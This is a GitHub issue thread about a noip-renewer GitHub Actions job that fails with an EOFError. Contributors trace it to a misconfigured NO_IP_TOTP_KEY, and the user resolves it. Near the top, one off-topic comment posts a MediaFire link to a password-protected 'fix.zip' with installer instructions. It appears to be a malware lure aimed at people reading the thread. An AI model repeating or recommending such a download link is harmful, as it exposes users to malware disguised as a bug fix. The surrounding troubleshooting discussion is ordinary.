### ISSUE TITLE
"EOFError: EOF when reading a line" on GitHub Actions

### ISSUE THREAD

**Issue by wulukewu** [simao-silva/noip-renewer#310]
Hi,

I'm developing a GitHub Action script to run a renewer by setting up a username and password through environment secrets. However, I'm encountering an issue where the script fails with an EOFError and exits with code 1. Since the script runs in a CI/CD environment, I cannot input the credentials manually.

Is there a way to resolve this problem and successfully pass the credentials to the script?

Thanks in advance for your help!

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by simao-silva** [comment]
Have you tried setting the values in secrets and then read then in jobs? I am thinking of something similar to [this](https://github.com/simao-silva/noip-renewer/blob/master/.github/workflows/docker-build-alpine.yml#L22-L23).

**Comment by wulukewu** [comment]
I tried it, and while the username and password work fine, the OTP code requires manual entry.

**Comment by simao-silva** [comment]
Even with the changes added in #313 ?

**Comment by wulukewu** [comment]
This seems to be the case, and I'm currently looking into it. When I try to log in from a different IP address, it prompts me to enter a six-character 2FA code, which should be passed from a Python script (otpauth.py). However, it seems that the validate_2fa function in renew.py halts the program, even when the correct six-character 2FA code is entered.
<img width="620" alt="image" src="https://github.com/user-attachments/assets/ac436df4-813d-41af-84ef-d4ed11affc1d">


- Passing six chars of 2FA code into `NO_IP_OTP_KEY`

<img width="528" alt="image" src="https://github.com/user-attachments/assets/c78102ed-b9c9-4ef2-ac84-bc97e69c7085">

- Passing six chars of 2FA code into `NO_IP_TOTP_KEY`

<img width="509" alt="image" src="https://github.com/user-attachments/assets/1b154a8e-30c8-4ba3-b654-acf5ad4644c5">

**Comment by ray1025** [comment]
@wulukewu 
https://github.com/simao-silva/noip-renewer/issues/189#issuecomment-2100240986

**Comment by ray1025** [comment]
> Hi,
> 
> I'm developing a GitHub Action script to run a renewer by setting up a username and password through environment secrets. However, I'm encountering an issue where the script fails with an EOFError and exits with code 1. Since the script runs in a CI/CD environment, I cannot input the credentials manually.
> 
> Is there a way to resolve this problem and successfully pass the credentials to the script?
> 
> Thanks in advance for your help!

https://github.com/simao-silva/noip-renewer/issues/221#issuecomment-2151153286

**Comment by ray1025** [comment]
@wulukewu 
https://github.com/simao-silva/noip-renewer/issues/221#issuecomment-2151153286
https://github.com/simao-silva/noip-renewer/issues/189#issuecomment-2100240986

**Comment by ray1025** [comment]
@simao-silva 
The problem is that he entered the key incorrectly. I believe merging #313 was a mistake.

**Comment by wulukewu** [comment]
In this case, you can easily generate the six-character authentication code using pyotp from a link formatted like this: `otpauth://totp/noip.com:***`
So, it looks like you can generate the code before logging in by using this method.

**Comment by ray1025** [comment]
While pyotp can definitely generate the code in advance, don’t you think it's odd that your code is added to the email section?

**Comment by ray1025** [comment]
Moreover, the original version runs stably on GitHub Actions. Based on your error screen, it seems like you’ve entered the wrong key.

**Comment by wulukewu** [comment]
I got it! It seems like my edit didn't help with the issue. I missed that the 16-character key in the screenshot below is the key I needed. I tried using that key in the `NO_IP_TOTP_KEY`, and it worked. Sorry for the confusion and thanks so much for your big help!
https://github.com/simao-silva/noip-renewer/issues/189#issuecomment-2100240986
